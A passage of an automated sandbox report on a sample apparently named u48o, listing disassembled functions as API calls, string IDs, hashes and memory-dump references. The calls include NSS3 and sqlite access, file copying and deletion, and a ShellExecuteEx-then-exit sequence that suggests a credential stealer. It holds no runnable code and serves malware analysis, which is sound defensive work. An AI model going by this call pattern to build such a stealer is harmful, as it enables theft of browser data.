                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                                                                                                                              • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                              • Instruction ID: aeafa54b844d2d9fda74643369b8d0143cca1d92b18e443df8d3a6a28b91a80d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4201C8B6910700ABE6309E66FC40BC7B7B5EF55318F044525E8AD86711D633F4268F93
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6C3A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C3A5B56
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3A2D9C
                                                                                                                                                                                                                                                • Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF
                                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C3A2DB2
                                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C3A2DCF
                                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C3A2DF2
                                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C3A2E0B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                                                                                                                              • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                              • Instruction ID: 7908f4bdb9ed8d1613f53d2ffde4d48896e0c9c0c263ec9bcc760bf8d579d5f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D601A5B6910600ABEA309E66FC01FC7B7B5EB51318F054535E89D86B11D633F4268A93
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                                                                                                                                                                              • String ID: F(t$%dx%d
                                                                                                                                                                                                                                              • API String ID: 2716131235-3934083006
                                                                                                                                                                                                                                              • Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
                                                                                                                                                                                                                                              • Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6C42A6D8), ref: 6C42AE0D
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C42AE14
                                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6C42A6D8), ref: 6C42AE36
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C42AE3D
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000,00000000,?,?,6C42A6D8), ref: 6C42AE47
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 682657753-0
                                                                                                                                                                                                                                              • Opcode ID: 78896e2288b4a54b08b153f4b99fff6d4c6c3b76e12fed7310b783c2628b0b26
                                                                                                                                                                                                                                              • Instruction ID: a43b593190b4c8766f804a7882ea4a43d3a34a578443981a7c539835e34d7e18
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78896e2288b4a54b08b153f4b99fff6d4c6c3b76e12fed7310b783c2628b0b26
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBF096B5201A01A7CF10EFA9E809E677B78BF86B757140329E92A83A40D735E116C7D5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185B3
                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185CA
                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 004185D8
                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004185E8
                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004185FC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                              • Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
                                                                                                                                                                                                                                              • Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C2A6D36
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C2A6D20
                                                                                                                                                                                                                                              • database corruption, xrefs: 6C2A6D2A
                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C2A6D2F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                                                                                              • Opcode ID: dbbf861c68941bd6d4a2e92ebaf7f0e83414aa170a71b7475bd9105c4f762a1c
                                                                                                                                                                                                                                              • Instruction ID: b23a5b2d4dd0bea86b858e4bcbd325b25c909da1a4863fe6da621bf7c8025abf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbbf861c68941bd6d4a2e92ebaf7f0e83414aa170a71b7475bd9105c4f762a1c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C421E234614B099BD710CE5AC881B5AB7E6BF84348F248528EC4A9BF51E371E94A8792
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00413415
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                              • API String ID: 1148417306-4251816714
                                                                                                                                                                                                                                              • Opcode ID: c182b738d743941975b88c70cbea89b78e61d7b8e1b7f3fcd29da090f854d54b
                                                                                                                                                                                                                                              • Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c182b738d743941975b88c70cbea89b78e61d7b8e1b7f3fcd29da090f854d54b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6C3DCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C3DCC7B), ref: 6C3DCD7A
                                                                                                                                                                                                                                                • Part of subcall function 6C3DCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C3DCD8E
                                                                                                                                                                                                                                                • Part of subcall function 6C3DCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C3DCDA5
                                                                                                                                                                                                                                                • Part of subcall function 6C3DCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C3DCDB8
                                                                                                                                                                                                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C3DCCB5
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6C4714F4,6C4702AC,00000090), ref: 6C3DCCD3
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6C471588,6C4702AC,00000090), ref: 6C3DCD2B
                                                                                                                                                                                                                                                • Part of subcall function 6C2F9AC0: socket.WSOCK32(?,00000017,6C2F99BE), ref: 6C2F9AE6
                                                                                                                                                                                                                                                • Part of subcall function 6C2F9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C2F99BE), ref: 6C2F9AFC
                                                                                                                                                                                                                                                • Part of subcall function 6C300590: closesocket.WSOCK32(6C2F9A8F,?,?,6C2F9A8F,00000000), ref: 6C300597
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                              • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                              • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                              • Opcode ID: 88fe60332e7215e543c69b65bb8e3b6566b8760504158d809afcb169e8e1359c
                                                                                                                                                                                                                                              • Instruction ID: 083a4b738205678babde6efb94d00ffeea6add64f8b1943361546991d6194238
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88fe60332e7215e543c69b65bb8e3b6566b8760504158d809afcb169e8e1359c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C1154F2B102605EDB15FF699867F827BB8A346238F141129E50ECBB41E775D4148BF2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                              • Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                                              • Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDE8
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDFC
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CE75
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                              • Opcode ID: 20b16cedb20524f5f0a3349ec898ee221183c09168d7a9fc23103f14ac9f8c1a
                                                                                                                                                                                                                                              • Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20b16cedb20524f5f0a3349ec898ee221183c09168d7a9fc23103f14ac9f8c1a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000,?,6C34C97F,?,?,?), ref: 6C3604BF
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,?,6C34C97F,?,?,?), ref: 6C3604F4
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,6C34C97F,?,?,?), ref: 6C36050D
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,6C34C97F,?,?,?), ref: 6C360556
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Alloc_CriticalEnterSectionUnlockUtilValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 349578545-0
                                                                                                                                                                                                                                              • Opcode ID: 2cb9f45775f897965f0b15414f677b73fa97f4c74a7ac99ce28ca6ba3109a30c
                                                                                                                                                                                                                                              • Instruction ID: 4fa5d1f0faf8c0763bd8ec65c58743a1b32a982a1d1a8b1c4131eb9916ca3fbb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cb9f45775f897965f0b15414f677b73fa97f4c74a7ac99ce28ca6ba3109a30c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63417BB0A056568FDB04DF2AC481669BBF4FF84318F14852DD9998BB05E731E891CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C316C8D
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C316CA9
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C316CC0
